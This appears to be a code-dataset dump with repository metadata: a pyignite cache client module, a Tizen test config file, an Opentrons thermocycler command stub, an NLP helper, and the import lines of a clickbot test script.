hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 11
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
251
| max_stars_repo_name
stringlengths 4
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
251
| max_issues_repo_name
stringlengths 4
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
251
| max_forks_repo_name
stringlengths 4
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.05M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.04M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6a0e0bcfcfbc438530da36eb95d62a35b14a3931
| 33,998 |
py
|
Python
|
modules/platforms/python/pyignite/api/key_value.py
|
DirectXceriD/gridgain
|
093e512a9147e266f83f6fe1cf088c0b037b501c
|
[
"Apache-2.0",
"CC0-1.0"
] | 1 |
2019-03-11T08:52:37.000Z
|
2019-03-11T08:52:37.000Z
|
modules/platforms/python/pyignite/api/key_value.py
|
DirectXceriD/gridgain
|
093e512a9147e266f83f6fe1cf088c0b037b501c
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
modules/platforms/python/pyignite/api/key_value.py
|
DirectXceriD/gridgain
|
093e512a9147e266f83f6fe1cf088c0b037b501c
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
# GridGain Community Edition Licensing
# Copyright 2019 GridGain Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License") modified with Commons Clause
# Restriction; you may not use this file except in compliance with the License. You may obtain a
# copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
# Commons Clause Restriction
#
# The Software is provided to you by the Licensor under the License, as defined below, subject to
# the following condition.
#
# Without limiting other conditions in the License, the grant of rights under the License will not
# include, and the License does not grant to you, the right to Sell the Software.
# For purposes of the foregoing, Sell means practicing any or all of the rights granted to you
# under the License to provide to third parties, for a fee or other consideration (including without
# limitation fees for hosting or consulting/ support services related to the Software), a product or
# service whose value derives, entirely or substantially, from the functionality of the Software.
# Any license notice or attribution required by the License must also include this Commons Clause
# License Condition notice.
#
# For purposes of the clause above, the Licensor is Copyright 2019 GridGain Systems, Inc.,
# the License is the Apache License, Version 2.0, and the Software is the GridGain Community
# Edition software provided with this notice.
from typing import Iterable, Union
from pyignite.queries.op_codes import *
from pyignite.datatypes import (
Map, Bool, Byte, Int, Long, AnyDataArray, AnyDataObject,
)
from pyignite.datatypes.key_value import PeekModes
from pyignite.queries import Query, Response
from pyignite.utils import cache_id
def cache_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache (overwriting existing value if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if a value
is written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(connection, {
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
})
def cache_get(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves a value from cache by key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a value
retrieved on success, non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_GET,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status != 0:
return result
result.value = result.value['value']
return result
def cache_get_all(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves multiple key-value pairs from cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a dict, made of
retrieved key-value pairs, non-zero status and an error description
on failure.
"""
query_struct = Query(
OP_CACHE_GET_ALL,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('data', Map),
],
)
if result.status == 0:
result.value = dict(result.value)['data']
return result
def cache_put_all(
connection: 'Connection', cache: Union[str, int], pairs: dict,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts multiple key-value pairs to cache (overwriting existing associations
if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param pairs: dictionary type parameters, contains key-value pairs to save.
Each key or value can be an item of representable Python type or a tuple
of (item, hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if key-value pairs
are written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_ALL,
[
('hash_code', Int),
('flag', Byte),
('data', Map),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'data': pairs,
},
)
def cache_contains_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Returns a value indicating whether given key is present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when key is present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_contains_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Returns a value indicating whether all given keys are present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: a list of keys or (key, type hint) tuples,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when all keys are present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, and returns the previous value
for that key, or null value if there was not such key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None if a value is written, non-zero status and an error description
in case of error.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, returning previous value
for that key, if and only if there is a value currently mapped
for that key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REPLACE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_remove(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Removes the cache entry with specified key, returning the value.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REMOVE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key
does not already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_get_and_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key does not
already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_replace_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample, value,
key_hint=None, sample_hint=None, value_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key already exists
and value equals provided sample.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param value: new value for the given key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param sample_hint: (optional) Ignite data type, for whic
the given sample should be converted
:param value_hint: (optional) Ignite data type, for which the given value
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_clear(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Clears the cache without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_clear_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache key without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
)
def cache_clear_keys(
connection: 'Connection', cache: Union[str, int], keys: list,
binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache keys without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache key without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample,
key_hint=None, sample_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
Removes an entry with a given key if provided value is equal to
actual value, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param sample_hint: (optional) Ignite data type, for whic
the given sample should be converted
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Removes entries with given keys, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_all(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Removes all entries from cache, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_ALL,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_get_size(
connection: 'Connection', cache: Union[str, int], peek_modes=0,
binary=False, query_id=None,
) -> 'APIResult':
"""
Gets the number of entries in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param peek_modes: (optional) limit count to near cache partition
(PeekModes.NEAR), primary cache (PeekModes.PRIMARY), or backup cache
(PeekModes.BACKUP). Defaults to all cache partitions (PeekModes.ALL),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a number of
cache entries on success, non-zero status and an error description
otherwise.
"""
if not isinstance(peek_modes, (list, tuple)):
if peek_modes == 0:
peek_modes = []
else:
peek_modes = [peek_modes]
query_struct = Query(
OP_CACHE_GET_SIZE,
[
('hash_code', Int),
('flag', Byte),
('peek_modes', PeekModes),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'peek_modes': peek_modes,
},
response_config=[
('count', Long),
],
)
if result.status == 0:
result.value = result.value['count']
return result
| 33.561698 | 100 | 0.62789 |
6a0e57de9c3d93fdc79f1a9d3f94690a6652bf6e
| 989 |
py
|
Python
|
wrt/wrt-manifest-tizen-tests/const.py
|
linshen/crosswalk-test-suite
|
e206b2c35fc09e583f3202fc7fc8a656c8e2b5de
|
[
"BSD-3-Clause"
] | null | null | null |
wrt/wrt-manifest-tizen-tests/const.py
|
linshen/crosswalk-test-suite
|
e206b2c35fc09e583f3202fc7fc8a656c8e2b5de
|
[
"BSD-3-Clause"
] | null | null | null |
wrt/wrt-manifest-tizen-tests/const.py
|
linshen/crosswalk-test-suite
|
e206b2c35fc09e583f3202fc7fc8a656c8e2b5de
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import sys, os
import itertools, shutil
path = os.path.abspath(__file__)
path = os.path.split(path)[0]
os.chdir(path)
print path
device_ssh_ip = ""
ssh_device = device_ssh_ip.split(",")
path_tcs = path + "/tcs"
path_result= path + "/result"
path_allpairs = path + "/allpairs"
path_resource = path + "/resource"
seed_file = path_allpairs + "/positive/input_seed.txt"
seed_negative = path_allpairs + "/negative"
seed_positive =path_allpairs + "/positivee"
seed_file_na = seed_negative + "/input_seed_negative.txt"
selfcomb_file = path_allpairs + "/selfcomb.txt"
output_file = path_allpairs + "/output.txt"
output_file_ne = path_allpairs + "/output_negative.txt"
report_path = path + "/report"
report_file = report_path + "/wrt-manifest-tizen-tests.xml"
report_summary_file = report_path + "/summary.xml"
sh_path = path + "/script"
log_path = report_path + "/log_"
device_path = "/home/app/content/tct/"
run_times = 3
version="6.35.1.2"
name="wrt-manifest-tizen-tests"
| 31.903226 | 59 | 0.743175 |
6a0e7a4577ac3f9f8b9fd994210704a26f91ee39
| 2,606 |
py
|
Python
|
api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
"""Command models to open a Thermocycler's lid."""
from __future__ import annotations
from typing import Optional, TYPE_CHECKING
from typing_extensions import Literal, Type
from pydantic import BaseModel, Field
from ..command import AbstractCommandImpl, BaseCommand, BaseCommandCreate
from opentrons.protocol_engine.types import MotorAxis
if TYPE_CHECKING:
from opentrons.protocol_engine.state import StateView
from opentrons.protocol_engine.execution import EquipmentHandler, MovementHandler
OpenLidCommandType = Literal["thermocycler/openLid"]
| 30.302326 | 87 | 0.699156 |
6a0eabac2607fdcd5104aaa4361b75c94d229375
| 373 |
py
|
Python
|
deep_utils/nlp/utils/utils.py
|
pooya-mohammadi/deep_utils
|
b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37
|
[
"MIT"
] | 36 |
2021-11-10T05:17:18.000Z
|
2022-03-27T18:25:10.000Z
|
deep_utils/nlp/utils/utils.py
|
pooya-mohammadi/deep_utils
|
b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37
|
[
"MIT"
] | 1 |
2021-12-03T07:07:18.000Z
|
2022-03-08T09:29:03.000Z
|
deep_utils/nlp/utils/utils.py
|
pooya-mohammadi/deep_utils
|
b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37
|
[
"MIT"
] | 4 |
2021-11-28T07:39:57.000Z
|
2022-03-30T05:46:10.000Z
|
def multiple_replace(text: str, chars_to_mapping: dict):
"""
This function is used to replace a dictionary of characters inside a text string
:param text:
:param chars_to_mapping:
:return:
"""
import re
pattern = "|".join(map(re.escape, chars_to_mapping.keys()))
return re.sub(pattern, lambda m: chars_to_mapping[m.group()], str(text))
| 31.083333 | 84 | 0.678284 |
6a0f2b7a58a3c8b7affaa9282ffcc01b705d987b
| 14,182 |
py
|
Python
|
tests/exe.py
|
toutpuissantged/clickbot-monster
|
b8ccefb5078104ea91d30b9147cc59f92c70ed57
|
[
"MIT"
] | 4 |
2021-02-11T13:43:55.000Z
|
2021-11-14T20:16:34.000Z
|
tests/exe.py
|
toutpuissantged/clickbot-monster
|
b8ccefb5078104ea91d30b9147cc59f92c70ed57
|
[
"MIT"
] | 3 |
2021-10-04T12:16:00.000Z
|
2021-12-10T06:02:41.000Z
|
tests/exe.py
|
toutpuissantged/clickbot-monster
|
b8ccefb5078104ea91d30b9147cc59f92c70ed57
|
[
"MIT"
] | null | null | null |
import marshal as ms
import zlib
import base64 as bs
